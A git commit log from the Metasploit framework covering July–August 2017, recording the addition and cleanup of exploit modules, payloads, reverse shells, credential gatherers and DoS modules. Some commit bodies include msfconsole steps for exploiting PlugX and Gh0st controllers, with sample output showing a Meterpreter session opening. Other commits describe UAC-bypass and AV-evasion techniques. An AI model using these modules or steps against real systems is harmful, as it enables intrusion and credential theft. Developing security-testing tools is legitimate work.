Calum Hutton
d0ff2694b3
Restart after payload process ends
2017-08-30 03:10:46 +01:00
Calum Hutton
aee44e3bd2
Working meterpreter exploit
...
No service restart
2017-08-30 03:10:46 +01:00
Calum Hutton
7cfb5fcc97
Rename
2017-08-30 03:10:46 +01:00
Calum Hutton
8b67b710fa
Add template
2017-08-30 03:10:46 +01:00
Brent Cook
202c936868
Land #8826 , git submodule remote command execution
2017-08-29 18:11:32 -05:00
Brent Cook
46eeb1bee0
update style
2017-08-29 17:44:39 -05:00
Pearce Barry
d5124fdc94
Land #8759 , Add TeamTalk Gather Credentials auxiliary module
2017-08-29 13:17:28 -05:00
Tim
39299c0fb8
randomize submodule path
2017-08-29 16:54:08 +08:00
Brendan Coles
c9e32fbb18
Remove last_attempted_at
2017-08-29 05:05:04 +00:00
h00die
a40429158f
40% done
2017-08-28 20:17:58 -04:00
Brent Cook
1e8edb377f
Land #8873 , cleanup enable_rdp, add error handling
2017-08-28 05:50:42 -05:00
Brent Cook
582b2e238e
update mettle payload to 0.2.2, add background and single-thread http comms
2017-08-28 05:31:44 -05:00
Brent Cook
15ec40f5c6
update R cached sizes
2017-08-28 05:31:42 -05:00
h00die
bd7ea1f90d
more updates, 465 more pages to go
2017-08-26 21:01:10 -04:00
james
7dfde651ea
Add login scanner module for Inedo BuildMaster
...
This module attempts to log into BuildMaster. BuildMaster is an application release automation tool.
More information about BuildMaster:
http://inedo.com/
2017-08-26 17:56:53 -05:00
Erik Lenoir
a8067070f2
Fix typo
2017-08-26 17:52:11 +02:00
William Vu
924c3de9f3
Land #7382 , BIND TSIG DoS
2017-08-26 10:42:35 -05:00
William Vu
f9a2c3406f
Clean up module
2017-08-26 10:41:10 -05:00
h00die
3420633f29
@NickTyrer corrected my correction
2017-08-26 08:43:10 -04:00
Erik Lenoir
801e3e2d68
Replace REXML with Nokogiri and try to cross id with mirror/repository tag
2017-08-25 18:28:09 +02:00
Jon P
abaf80f3df
jmartin improvements (iter on keys + save as credentials)
2017-08-25 18:15:24 +02:00
h00die
32a4436ecd
first round of spelling/grammar fixes
2017-08-24 21:38:44 -04:00
n00py
8f17d536a7
Update phpmailer_arg_injection.rb
...
Removed second parameter as it was not necessary. Only changed needed was to change "send_request_cgi" to "send_request_cgi!"
2017-08-24 00:29:28 -06:00
n00py
c49b72a470
Follow 301 re-direct
...
I found that in some cases, the trigger URL cannot be accessed directly. For example, if the uploaded file was example.php, browsing to "example.php" would hit a 301 re-direct to "/example". It isn't until hitting "/example" that the php is executed. This small change will just allow the trigger to follow one 301 redirect.
2017-08-23 18:53:54 -06:00
Brent Cook
821121d40b
Land #8871 , improve compatibility and speed of JDWP exploit
2017-08-23 18:53:47 -05:00
Jeffrey Martin
cba4d36df2
provide missing bits for R platform
2017-08-23 16:58:48 -05:00
William Vu
4c285c0129
Land #8827 , QNAP Transcode Server RCE
2017-08-22 23:07:01 -05:00
Jon Hart
7b18c17445
Appease rubocop
2017-08-22 14:53:21 -07:00
Brent Cook
128949217e
more osx
2017-08-22 16:48:09 -05:00
Jon Hart
2969da3d70
Merge branch 'upstream-master' into feature/cisco-smi-scanner
2017-08-22 14:39:44 -07:00
Brent Cook
bb120962aa
more osx support
2017-08-22 14:01:48 -05:00
Brent Cook
7263c7a66e
add 64-bit, osx support
2017-08-22 13:51:28 -05:00
Erik Lenoir
be2739d335
Transform loots into creds
2017-08-22 11:57:51 +02:00
Brent Cook
33f2ebc2aa
code cleanup
2017-08-21 22:46:30 -05:00
Brent Cook
58e332cc7c
only fail if the group sids fail to resolve and we actually have to add a user
2017-08-21 22:36:40 -05:00
Louis Sato
e01caac9ed
removing slice operators from jdwp_debugger
2017-08-21 16:36:54 -05:00
Brent Cook
031f48725f
add missing quotes
2017-08-21 16:16:03 -05:00
Brent Cook
edbe8d73c2
Revert "Revert passive stance for multi/handler"
...
This reverts commit 66a4ea4f0b
.
2017-08-21 16:14:23 -05:00
Brent Cook
c14daf3fcc
Land #8857 , Reverse and bind shells in R
2017-08-21 15:49:24 -05:00
Brent Cook
605330faf6
Land #8842 , add linux/aarch64/shell_reverse_tcp
2017-08-21 15:44:28 -05:00
Brent Cook
430251b8f6
fix compatibility with php meterpreter
2017-08-21 15:37:31 -05:00
RageLtMan
2873a899db
Address msftidy complaint
2017-08-21 03:39:03 -04:00
Tim
d6d6c67f33
add stage_shell.s and cleanup
2017-08-21 14:42:30 +08:00
Tim
e1a7494724
linux payloads should default to /bin/sh
2017-08-21 12:25:27 +08:00
Tim
9768a89bcd
aarch64 staged shell
2017-08-21 11:14:42 +08:00
RageLtMan
7ab097a784
Unix cmd versions of R payloads
...
Use R to connect back from a unix shell.
Notes:
We need to DRY this up - tons of copy pasta here, when we should
really be instantiating the language specific payloads and just
wrapping them with CLI execution strings.
Testing:
None, yet, just did the quick port to wrap this and push to CI
now that rex-arch #4 is in.
2017-08-20 21:25:57 -04:00
Brent Cook
f961495860
Land #8625 , Remove OpenSSL from Windows Meterp, packet header changes, and TLV packet encryption
2017-08-20 19:13:51 -05:00
Brent Cook
b864083cbd
update payload sizes
2017-08-20 19:03:53 -05:00
Brent Cook
eabe4001c2
Land #8492 , Add IBM OpenAdmin Tool SOAP welcomeServer PHP Code Execution module
2017-08-20 18:48:22 -05:00
Brent Cook
cbd7790e95
Land #8751 , Add Asterisk Gather Credentials auxiliary module
2017-08-20 18:34:27 -05:00
Brent Cook
07ee33578d
Land 8804, tidy up mdaemon credential extraction module
2017-08-20 18:26:56 -05:00
Brent Cook
85df247c84
DRY up module, fix remaining style violations
2017-08-20 18:24:41 -05:00
Brent Cook
367c760927
window move is now directly in the template
2017-08-20 17:48:59 -05:00
Brent Cook
e734a7923a
Land #8267 , Handle multiple entries in PSModulePath
2017-08-20 17:44:30 -05:00
Brent Cook
1225555125
remove unnecessary require
2017-08-20 17:37:42 -05:00
Brent Cook
840c0d5f56
Land #7808 , add exploit for VMware VDP with known ssh private key (CVE-2016-7456)
2017-08-20 17:36:45 -05:00
Brent Cook
88f39d924b
Land #8816 , added Jenkins v2 cookie support
2017-08-20 14:58:38 -05:00
Brent Cook
f7dc831e9a
Land #8799 , Add module to detect Docker, LXC, and systemd-nspawn containers
2017-08-20 14:45:57 -05:00
Brent Cook
aa797588e8
Land #8847 , Look for sp_execute_external_script in mssql_enum
2017-08-20 14:32:35 -05:00
Brent Cook
2eba188166
Land #8789 , Add COM class ID hijack method for bypassing UAC
2017-08-20 13:57:17 -05:00
Brent Cook
e8ab518d76
Land #8853 , Revert passive stance for multi/handler
2017-08-19 22:04:26 -05:00
RageLtMan
d76616e8e8
Reverse and bind shells in R
...
Initial implementation of bind and reverse TCP shells in R.
Supports IPv4 and 6, provides stateless sessions which wont change
the cwd when cd is invoked since each command invocation actually
spawns a pipe to execute that specific line's invocation.
R injections are common in academic software written in a hurry by
students or lab administrators. The language runtimes are also
commonly found adjacent to valuable data, and often used by teams
which are not directly responsible for information security.
Testing:
Local testing with netcat bind and rev handlers.
TODO:
Add the appropriate platform/language library definitions
2017-08-19 06:12:05 -04:00
William Webb
6ecdb8f2cc
Land #8852 , convert quest_pmmasterd_bof to cmd_interact/find
2017-08-18 13:20:17 -05:00
William Vu
66a4ea4f0b
Revert passive stance for multi/handler
...
It's gotten to be a bit annoying. ExitOnSession=false was good, but this
was too much. Typing run -j isn't difficult.
2017-08-18 13:16:12 -05:00
Erik Lenoir
cde319a5ec
Optim module and add doc
2017-08-18 19:30:41 +02:00
Erik Lenoir
b529c3551c
Remove unused variable
2017-08-18 19:00:32 +02:00
h00die
dc358dd087
unknow to unknown
2017-08-18 11:33:48 -04:00
William Vu
d659cdc8f6
Convert quest_pmmasterd_bof to cmd_interact/find
2017-08-18 00:19:09 -05:00
Brent Cook
ea5370486f
minor unused variable fixes
2017-08-17 16:46:51 -04:00
Brent Cook
9c196041ce
update youtube urls in post exploit module
2017-08-17 16:44:35 -04:00
Tim
8b4ccc66c7
add linux/aarch64/shell_reverse_tcp
2017-08-17 18:55:37 +08:00
james
e642789674
Look for sp_execute_external_script in mssql_enum
...
sp_execute_external_script can be used to execute code in MSSQL.
MSSQL 2016+ can be configured to execute R code. MSSQL 2017 can
be configured to execute Python code.
Documentation:
https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/sp-execute-external-script-transact-sql
https://docs.microsoft.com/en-us/sql/advanced-analytics/tutorials/rtsql-using-r-code-in-transact-sql-quickstart
Interesting uses of sp_execute_external_script:
R - https://pastebin.com/zBDnzELT
Python - https://gist.github.com/james-otten/63389189ee73376268c5eb676946ada5
2017-08-16 21:40:03 -05:00
Richard Claus
f07318c976
Fix post/linux/gather/hashdump NoMethodError
2017-08-16 00:56:32 -07:00
Brent Cook
70a82b5c67
Land #8834 , add resiliency to x64 linux reverse_tcp stagers
2017-08-15 08:04:32 -04:00
Brent Cook
df98c2a3dd
update cached sizes again
2017-08-15 08:02:51 -04:00
Brent Cook
debbc31142
use separate module names for x86 and x64 generators
2017-08-15 08:02:01 -04:00
tkmru
4dbf94556e
update CacheSize
2017-08-15 12:54:30 +09:00
Brendan Coles
ac976eee8e
Add author
2017-08-15 03:27:40 +00:00
Brent Cook
e3265c4b1b
Land #8697 , fix oracle_hashdump and jtr_oracle_fast modules
2017-08-14 17:36:18 -04:00
Brent Cook
69c4ae99a7
Land #8811 , fix peer printing with bruteforce modules
2017-08-14 17:31:48 -04:00
Erik Lenoir
b4055a8071
Rename command
2017-08-14 23:26:18 +02:00
Erik Lenoir
55db70ec3e
Handle case when locate is not here by using enum_directories_map
2017-08-14 23:25:01 +02:00
William Vu
1a4db844c0
Refactor build_brute_message for legacy printing
2017-08-14 11:17:34 -05:00
Brent Cook
b8f56d14e0
Land #8698 , Add HEADERS to php_eval module
2017-08-14 09:54:22 -04:00
Erik Lenoir
27822c2ccf
Add Maven creds module
2017-08-14 14:59:59 +02:00
Brent Cook
9fdf2ca1f4
Land #8830 , Cleanup auxiliary/scanner/msf/msf_rpc_login
2017-08-14 02:47:08 -04:00
Brendan Coles
fa4fae3436
Cleanup auxiliary/scanner/msf/msf_rpc_login
2017-08-14 06:34:04 +00:00
Brent Cook
59086af261
Land #8771 , rewrite linux x64 stagers with Metasm
2017-08-14 02:32:29 -04:00
Brent Cook
26193216d1
Land #8686 , add 'download' and simplified URI request methods to http client mixin
...
Updated PDF author metadata downloader to support the new methods.
2017-08-14 01:40:17 -04:00
Brent Cook
7d4561e0fd
rename to download_log to avoid conflicting with the mixin
2017-08-14 01:10:37 -04:00
Brent Cook
5d05ca154a
added http client 'download' method and updates to pdf author module from @bcoles
2017-08-14 01:08:53 -04:00
Brendan Coles
0a374b1a88
Add QNAP Transcode Server Command Execution exploit module
2017-08-13 09:13:56 +00:00
Patrick Thomas
25764397ba
Update CachedSizes for changed nodejs payloads
...
Fixes test failures
2017-08-12 23:21:54 -07:00
Tim
7881a7ddc4
git submodule command exec
2017-08-13 11:47:44 +08:00
zerosum0x0
ecfe3d0235
added optional DoublePulsar check
2017-08-11 11:36:59 -06:00
Pearce Barry
bb5fffebc4
Land #8796 , SMBLoris Denial of Service Module.
2017-08-09 16:24:55 -05:00
Pearce Barry
901a1fdd1b
Minor tweaks.
2017-08-09 15:44:32 -05:00
Jon Hart
1b6acd768e
Land #8817 , fixing @jhart-r7's ruby 2.2 blunder
2017-08-09 13:19:20 -07:00
Christian Mehlmauer
1b6b29c22b
fix error with rdp scanníng
2017-08-09 21:32:15 +02:00
thesubtlety
7e860571ae
fix bug where api_token auth was being used without token being set
2017-08-09 12:30:26 -04:00
thesubtlety
9bb102d72d
add jenkins v2 cookie support
2017-08-09 12:29:31 -04:00
bwatters-r7
dd79aa3afb
Land #8627 , Add post module multi/gather/jenkins
2017-08-09 10:43:21 -05:00
Brent Cook
0ac19087cd
Land #8720 , add resiliency (retries + sleep) to linux x86 stagers
2017-08-08 19:36:47 -05:00
William Vu
3396afb41a
Add IP and port (peer) to print_brute messages
2017-08-08 15:46:40 -05:00
William Vu
39e59805f9
Fix annoying print_brute messages in ssh_login
2017-08-08 15:15:23 -05:00
David Maloney
67e86da50b
make SMBLoris run continuously as requested
...
as per ZeroSum's request the module now runs
continuously, refreshing the connections on every pass
until manually killed
2017-08-08 10:16:16 -05:00
Agora Security
2fab8f5d2a
Fix Spaces at EOL
2017-08-07 16:39:16 -04:00
Agora Security
663824de85
Fix indentation, fix how locations adds values and remove unnecesary code
2017-08-07 13:16:27 -04:00
Pearce Barry
cfd377fbd4
Support padding on the CAN bus.
...
Also use a hash for passing options around instead of individual params.
2017-08-06 18:05:59 -05:00
james
b8d794cc37
Identify systemd-nspawn containers in checkcontainer
...
Check the value of the "container" environment variable:
- "lxc" indicates a LXC container
- "systemd-nspawn" indicates a systemd nspawn container
2017-08-06 00:46:09 -05:00
james
9858147dae
Add module to detect Docker and LXC containers
...
Detect Docker by:
- Presence of .dockerenv file.
- Finding "docker" in /proc/1/cgroup
Detect LXC by:
- Finding "lxc" in /proc/1/cgroup
2017-08-05 18:59:36 -05:00
Martin Pizala
2383afd8dc
Fix improved error handling
2017-08-04 23:42:44 +02:00
David Maloney
289f03241b
add module documentation
...
add module docs for the new smbloris DoS
2017-08-04 16:10:44 -05:00
David Maloney
15cc2a9dc0
removedthreading stuff, tried keepalives
...
still seem to be topping out at
about 1.3GB allocated
2017-08-04 15:28:01 -05:00
Brent Cook
7ce813ae6e
Land #8767 , Add exploit module for CVE-2017-8464
...
LNK Code Execution Vulnerability
2017-08-03 17:10:16 -05:00
Brent Cook
da3ca9eb90
update some documentation
2017-08-03 17:09:44 -05:00
David Maloney
e73ffe648e
tried adding supervisor model to smbloris
...
tried to overcome issues with slowdown
around the 4500 connection mark by using the
supervisor pattern to terminate the threads on
the backend. this seems to get us further, but we still
hit a slowdown and the allocations die out before
we hit any serious usage
2017-08-03 14:19:35 -05:00
David Maloney
c9da2d56b9
first pass at SMBLoris DoS module
...
the first pass on the DoS module for SMBLoris
running into issues with it topping out around 600MB
2017-08-03 11:32:57 -05:00
Brent Cook
ddd841c0a8
code style cleanup + add automatic targeting based on payload
2017-08-03 00:27:54 -05:00
Brent Cook
b62429f6fa
handle drive letters specified like E: nicely
2017-08-03 00:27:22 -05:00
Yorick Koster
46ec04dd15
Removed This PC ItemID & increased timeout in WaitForSingleObject
...
Remove the This PC ItemID to bypass (some) AV.
Timeout for WaitForSingleObject is set to 2,5s. After this timeout a
mutex is released allowed a new payload to be executed.
2017-08-02 15:47:22 -05:00
Yorick Koster
e51e1d9638
Added new DLL templates to prevent crashing of Explorer
2017-08-02 15:47:21 -05:00
Yorick Koster
3229320ba9
Code review feedback from @nixawk
2017-08-02 15:46:51 -05:00
Yorick Koster
565a3355be
CVE-2017-8464 LNK Remote Code Execution Vulnerability
...
This module exploits a vulnerability in the handling of Windows
Shortcut files (.LNK) that contain a dynamic icon, loaded from a
malicious DLL.
This vulnerability is a variant of MS15-020 (CVE-2015-0096). The
created LNK file is similar except in an additional
SpecialFolderDataBlock is included. The folder ID set in this
SpecialFolderDataBlock is set to the Control Panel. This is enought to
bypass the CPL whitelist. This bypass can be used to trick Windows into
loading an arbitrary DLL file.
2017-08-02 15:46:30 -05:00
Martin Pizala
b78cb12546
Ruby 2.2 support. See #8792
2017-08-02 18:06:48 +02:00
Jon P
adbeab81da
Avoid exceptions
2017-08-02 15:03:36 +02:00
Brent Cook
6f97e45b35
enable Ruby 2.2 compat checks in Rubocop, correct multi/handler compat
2017-08-02 06:18:02 -05:00
OJ
54ded4300e
Land #8791 - Update Accuvant refs to point to Optiv
2017-08-02 13:26:52 +10:00
TC Johnson
8989d6dff2
Modified Accuvant bog posts to the new Optive urls
2017-08-02 13:25:17 +10:00
Brent Cook
bb2304a2d1
Land #8769 , improve style, compatibility, for ssh modules
2017-08-01 21:43:32 -05:00
Brent Cook
1d75a30936
update style for other ssh exploits
2017-08-01 16:05:25 -05:00
Brent Cook
8c9fb1d529
remove unneeded netssh checks in modules
2017-08-01 14:46:10 -05:00
Brent Cook
4395f194b1
fixup style warnings in f5 bigip privkey exploit
2017-08-01 14:45:05 -05:00
Brent Cook
e61cccda0b
Land #8779 , Adding error handler for ms17-010 exploit where SMBv1 is disabled
2017-08-01 14:00:12 -05:00
OJ
6ee5d83a15
Add the COM hijack method for bypassing UAC
2017-07-31 14:26:39 +10:00
Professor-plum
055d64d32b
Fixed to modules as suggested from upstream
...
fixed typo in xtreme.rb when communicating with C&C
removed self.class from options on all three modules
added line to log path where loot has been stored in xtreme.rb
2017-07-30 10:14:05 -06:00
Martin Pizala
60c3882b84
Improved error handling
2017-07-30 09:07:52 +02:00
Professor-plum
99546330f1
Added PlugX Controller Stack Overflow Module
...
This module exploits a stack overflow in the Plug-X Controller when handling a larger than expected message. This vulnerability can allow remote code execution however it causes a popup message to be displayed on the target before execution is gained.
## Verification
Run the PlugX C2 server on a target windows machine. The sample 9f59a606c57217d98a5eea6846c8113aca07b203e0dcf17877b34a8b2308ade6 is a Plux Type 1 server that works good for testing.
- [ ] use exploit/windows/misc/plugx
- [ ] set RHOST [ip of target]
- [ ] set target 1
- [ ] exploit
- [ ] acknowledge the "PeDecodePacket" message on the target
Sample output:
```
msf> use exploit/windows/misc/plugx
msf exploit(plugx) > set rhost 192.168.161.128
rhost => 192.168.161.128
msf exploit(plugx) > set target 1
target => 1
msf exploit(plugx) > check
[*] 192.168.161.128:13579 - "\x03\xB0\x02\x00\x04\x00"
[*] 192.168.161.128:13579 The target appears to be vulnerable.
msf exploit(plugx) >
2017-07-29 10:36:42 -06:00
Professor-plum
c336daec8d
Added Gh0st Controller Buffer Overflow Module
...
This module exploits a buffer overflow in the Gh0st Controller when handling a drive list as received by a victim. This vulnerability can allow remote code execution
## Verification
Run the Gh0st C2 server on a target windows machine. The sample 0efd83a87d2f5359fae051517fdf4eed8972883507fbd3b5145c3757f085d14c is a Gh0st 3.6 server that works good for testing.
- [ ] use exploit/windows/misc/gh0st
- [ ] set RHOST [ip of target]
- [ ] exploit
Sample output:
```
msf > use exploit/windows/misc/gh0st
msf exploit(gh0st) > set rhost 192.168.161.128
rhost => 192.168.161.128
msf exploit(gh0st) > exploit
[*] Started reverse TCP handler on 192.168.161.1:4444
[*] 192.168.161.128:80 - Trying target Gh0st Beta 3.6
[*] 192.168.161.128:80 - Spraying heap...
[*] 192.168.161.128:80 - Trying command 103...
[*] Sending stage (957487 bytes) to 192.168.161.128
[*] Meterpreter session 1 opened (192.168.161.1:4444 -> 192.168.161.128:49161) at 2017-07-29 10:11:4
2017-07-29 10:21:05 -06:00
tkmru
14507747d0
update CachedSize
2017-07-29 23:42:43 +09:00
tkmru
b1e26dd17e
Merge branch 'master' of https://github.com/rapid7/metasploit-framework into feature/linux_reverse_tcp_x86_retry
2017-07-29 17:24:59 +09:00
wchen-r7
c5021bf665
Land #8761 , Add CVE-2017-7442: Nitro Pro PDF Reader JS API Code X
2017-07-28 17:02:59 -05:00
Jon P
85f48b96bb
Fix syntax
2017-07-28 10:16:59 +02:00
Martin Pizala
6a20e1ac7d
Add module Rancher Server - Docker Exploit
2017-07-28 08:04:21 +02:00
multiplex3r
b2ecaa489d
Rescue only RubySMB::Error::CommunicationError
2017-07-27 19:19:45 +10:00
multiplex3r
f2091928ec
Adding no SMBv1 error handler for ms17-010 exploit
2017-07-27 16:21:09 +10:00
Ricardo Almeida
4845b4b1fa
Orientdb 2.2.x RCE - Fix regular expression for version detection
2017-07-26 14:35:05 +01:00
Jon P
2e87a3d3f8
Multi Gather Docker Credentials Collection
2017-07-26 15:14:16 +02:00
Ricardo Almeida
30664924c8
Orientdb 2.2.x RCE - Reverted to send_request_raw due to issues exploiting windows boxes
2017-07-26 13:59:14 +01:00
tkmru
eb536ba67c
Merge branch 'master' of https://github.com/rapid7/metasploit-framework into feature/linux_reverse_tcp_x64_retry
2017-07-26 09:48:17 +09:00
Martin Pizala
853ae9a6ce
Add new reference
2017-07-26 02:16:56 +02:00
1cph93
9c930aad6e
Add space after comma in f5_bigip_known_privkey module to coincide with Ruby style guide
2017-07-25 19:43:29 -04:00
Martin Pizala
cd418559bc
Docker Daemon - Unprotected TCP Socket Exploit
2017-07-26 00:21:35 +02:00
Brent Cook
354869205a
make exploit/multi/handler passive
...
This gives exploit/multi/handler a makeover, updating to use more-or-less
standard Ruby, and removing any mystical hacks at the same time (like select
instead of sleep).
This also gives it a Passive stance, and sets ExitOnSession to be false by
default, which is the setting that people use 99% of the time anyway.
2017-07-24 15:47:06 -07:00
mr_me
bf4dce19fb
I added the SSD advisory
2017-07-24 14:25:10 -07:00
mr_me
b099196172
deregistered SSL, added the HTA dodgy try/catch feature
2017-07-24 10:28:03 -07:00
mr_me
17b28388e9
Added the advisory, opps
2017-07-24 10:09:21 -07:00
mr_me
14ca2ed325
Added a icon loading trick by Brendan
2017-07-24 10:06:20 -07:00
mr_me
b2a002adc0
Brendan is an evil genius\!
2017-07-24 09:58:23 -07:00
mr_me
cc8dc002e9
Added CVE-2017-7442
2017-07-24 08:21:59 -07:00
Brendan Coles
d66e8062e7
Add TeamTalk Gather Credentials auxiliary module
2017-07-24 14:24:38 +00:00
Brent Cook
6300758c46
use https for metaploit.com links
2017-07-24 06:26:21 -07:00
Brent Cook
80d18fae6a
update example modules to have zero violations
2017-07-24 06:15:54 -07:00
Brent Cook
1d290d2491
resurrect one print_error/bad conversion for symmetry
2017-07-24 05:55:34 -07:00
Brent Cook
8db3f74b81
fix a broken link
2017-07-24 05:53:09 -07:00
Brent Cook
838b066abe
Merge branch 'master' into land-8716
2017-07-24 05:51:44 -07:00
Ricardo Almeida
6c22f785e9
Orientdb 2.2.x RCE - Fine tune vulnerable version detection; removed redundant uri normalization checking; Swapped send_request_raw for send_request_cgi; using vars_get;
2017-07-24 09:52:47 +01:00
Brent Cook
8444038c62
Add eval alternative to PHP Meterpreter to bypass suhosin
...
See https://suhosin.org/stories/index.html for more information on this system.
2017-07-23 22:04:09 -07:00
Pearce Barry
fb905c4bc7
Land #8754 , fix some module documentation
2017-07-23 11:44:07 -05:00
Pearce Barry
a140209c36
Land #8739 , cleanup windows_autologin
2017-07-23 11:35:34 -05:00
Brent Cook
7c55cdc1c8
fix some module documentation
...
3 modules got documentation landed in the wrong spot. This also fixes a few
typos and improves formatting.
2017-07-23 07:46:52 -07:00
Brent Cook
df22e098ed
Land #8695 , Fix #8675 , Add Cache-Control header, also meta tag for BAP2
2017-07-23 07:17:45 -07:00
Brent Cook
8c8dbc6d38
Land #8692 , Fix #8685 , Check nil condition for #wordlist_file in jtr modules
2017-07-23 07:12:21 -07:00
Brent Cook
2c3712479d
Land #8750 , openssl_heartbleed fix, use ruby 2.4 OpenSSL::PKey::RSA API
2017-07-23 06:58:40 -07:00
Brent Cook
b75530b978
Fix an issue where 'sleep' with Python Meterpreter appears to fail.
2017-07-23 05:38:06 -07:00
Brent Cook
399557124f
update payload cached sizes
2017-07-23 05:28:32 -07:00
Brendan Coles
109fd8b6d3
Add Asterisk Gather Credentials auxiliary module
2017-07-23 09:55:12 +00:00
Christian Mehlmauer
b4bb384577
add @pbarry-r7 's feedback
2017-07-22 18:54:36 +02:00
g0tmi1k
e710701416
Made msftidy.rb happy
...
...untested with the set-cookie 'fix'
2017-07-21 19:55:26 -07:00
Pearce Barry
6bb745744b
Land #8471 , Add VICIdial user_authorization Unauthenticated Command Execution module
2017-07-21 15:57:08 -05:00
Evgeny Naumov
5d04775f5e
use 2.4 OpenSSL::PKey::RSA api
2017-07-21 16:28:07 -04:00
g0tmi1k
524373bb48
OCD - Removed un-needed full stop
2017-07-21 07:41:51 -07:00
g0tmi1k
772bec23a1
Fix various typos
2017-07-21 07:40:08 -07:00
M4P0
c187f709dc
Update geutebrueck_gcore_x64_rce_bo.rb
...
Review changes with msftidy.
2017-07-21 11:37:12 +02:00
Brent Cook
510ff888fd
Land #8439 , native OSX meterpreter support
2017-07-20 22:01:49 -05:00
thesubtlety
7d033688ce
clean up formatting
2017-07-19 17:27:44 -04:00
bwatters-r7
ffad0d1bbf
Land #8559 , Ipfire oinkcode exec
2017-07-19 14:31:18 -05:00
bwatters-r7
116a838cb0
Version check update and stylistic fix
2017-07-19 13:26:40 -05:00
g0tmi1k
3f6925196b
OCD - store_loot & print_good
2017-07-19 13:02:49 +01:00
g0tmi1k
ef826b3f2c
OCD - print_good & print_error
2017-07-19 12:48:52 +01:00
g0tmi1k
0f453c602e
Even more print_status -> print_good
2017-07-19 11:46:39 +01:00
g0tmi1k
df9b642746
More print_status -> print_good
2017-07-19 11:39:15 +01:00
g0tmi1k
b8d80d87f1
Remove last newline after class - Make @wvu-r7 happy
2017-07-19 11:19:49 +01:00
g0tmi1k
3d4feffc62
OCD - Spaces & headings
2017-07-19 11:04:15 +01:00
Ricardo Almeida
f3f96babb9
Orientdb 2.2.x RCE - Changed the java_craft_runtime_exec function; Tested the module against Win7-Pro-x64 with OrientDB v2.2.20 with StagerCmd flavors vbs and certutil with success
2017-07-19 10:46:10 +01:00
g0tmi1k
a008f8e795
BruteForce - > Brute Force
2017-07-19 10:39:58 +01:00
thesubtlety
5d4105db33
minor fixes per rubocop
2017-07-18 22:36:45 -04:00
Christian Mehlmauer
0d3f5ae220
cleanup windows_autologin
2017-07-18 22:50:34 +02:00
Jon Hart
45f81f3c98
Squash some style issues
2017-07-18 12:45:02 -07:00
Brent Cook
cc3168933f
update mettle payloads, template generator
2017-07-18 13:13:38 -05:00
Ricardo Almeida
219987726f
Orientdb 2.2.x RCE - Changed the CmdStager flavor to VBS script
2017-07-18 17:18:14 +01:00
Ricardo Almeida
5ca523e2ce
Orientdb 2.2.x RCE - Add warning about windows
2017-07-18 17:11:54 +01:00
Ricardo Almeida
af0a9c2f86
Orientdb 2.2.x RCE tidy stuff
2017-07-18 17:07:29 +01:00
Ricardo Almeida
99ba645034
Orientdb 2.2.x RCE
2017-07-18 16:53:44 +01:00
Brent Cook
f5e76092d6
Merge branch 'master' into land-8439-
2017-07-18 08:25:18 -05:00
bwatters-r7
ba92d42b57
Updated version check per @bcoles
2017-07-17 15:52:50 -05:00
Jon Hart
e93e524c3b
Merge branch 'upstream-master' into feature/rdp-scanner
2017-07-17 13:46:59 -07:00
Jon Hart
43e04c8894
Improve RDP probe packet
2017-07-17 13:14:47 -07:00
David Maloney
2a1c661c79
Land #8723 , Razr Synapse local exploit
...
lands ZeroSteiner's Razr Synapse local priv esc module
2017-07-17 13:34:17 -05:00
tkmru
6c5d8279ca
change to generate payload from metasm
2017-07-16 19:21:09 +09:00
Spencer McIntyre
b4813ce2c7
Update the pre-exploit check conditions
2017-07-15 14:48:54 -04:00
Pearce Barry
9775df1f6e
Land #8586 , Easy Chat Server 2 to 3.1 - Buffer overflow (SEH) exploit
2017-07-14 15:20:01 -05:00
David Maloney
ee1c87b868
Land #8172 , example modules
...
lands several example modules
2017-07-14 15:17:20 -05:00
Jon Hart
e3e5c33b9b
WIP commit of RDP scanner
2017-07-14 13:02:43 -07:00
David Maloney
8f6cac9c37
Land #8652 , rpc console write exploit
...
lands pr for the metasploit rpc console write exploit
2017-07-14 14:47:35 -05:00
David Maloney
0fde6c6b42
Land #8650 , igss9 launch path
...
land pr to fix launch path in the igss9 exploit
2017-07-14 14:39:38 -05:00
Spencer McIntyre
833b2a67d4
Fix the architecture check for only x64
2017-07-14 07:06:54 -04:00
g0tmi1k
4720d1a31e
OCD fixes - Spaces
2017-07-14 08:46:59 +01:00
g0tmi1k
9309115627
OCD - Banner clean up
2017-07-14 08:19:50 +01:00
g0tmi1k
fd843f364b
Removed extra lines
2017-07-14 08:17:16 +01:00
g0tmi1k
a79692aac1
Typo
2017-07-14 08:16:30 +01:00
tkmru
5d45680bc1
Merge branch 'master' of https://github.com/rapid7/metasploit-framework into feature/linux_reverse_tcp_x86_retry
2017-07-14 13:53:53 +09:00
tkmru
f66021c8a2
update CachedSize
2017-07-14 13:53:43 +09:00
g0tmi1k
67310fa96c
print_status -> print_good. [When it is successful, show it!]
2017-07-14 00:09:35 +01:00
g0tmi1k
424522147e
OCD fixes - Start of *.rb files
2017-07-13 23:53:59 +01:00
bwatters-r7
de230478eb
Land #8566 , Add ye olde NNTP Login Utility scanner module
2017-07-13 13:19:34 -05:00
Spencer McIntyre
5470670223
Change the hook for windows 10 compatibility
2017-07-13 11:49:06 -04:00
Jon Hart
e52e9c147d
First commit for Cisco Smart Install Scanner
2017-07-12 19:12:06 -07:00
Pearce Barry
59de7d3635
Land #8671 , Add a module for CVE-2017-7615
2017-07-12 14:58:02 -05:00
Pearce Barry
580219695a
Oof, missed the parens...
2017-07-12 13:52:59 -05:00
Pearce Barry
aa22651340
Few style/spelling tweaks, nothing to see here...
2017-07-12 13:41:20 -05:00
James Barnett
e43adf0223
Land #8710 , explicitly use Rex::Encoder::XDR
...
The previous use of XDR in these modules allowed for namespace collisions
with similar gems.
2017-07-12 12:01:24 -05:00
Brent Cook
345407b0a4
Rex::Encoder::XDR conflicts with the XDR gem
2017-07-12 11:52:10 -05:00
Pearce Barry
e69460a529
Land #8683 , Remove duplicate setting of suhosin.simulation in php_cgi_arg_injection
2017-07-12 09:34:35 -05:00
h00die
b7d082fe06
land #8679 update to credits for rfpwnon
2017-07-11 19:36:41 -04:00
William Webb
aa0fca9dd1
Land #8631 , Add railgun support to Python Meterpreter for the OSX
...
platform
2017-07-11 16:05:16 -05:00
RageLtMan
5473b2132d
Implement :request_url for Msf HttpClient mixin
...
To round out implementation of a simple path for users to access
HttpClient like Open or Net::HTTP, create :request_url method which
takes a single URL parameter, uses :request_opts_from_url to build
the request configuration for Rex::Proto::Http::Client, executes
a GET request with it, and disconnects the client unless keepalive
is specified as the second parameter to :request_url.
Example usage of functionality is implemented in http_pdf_authors.
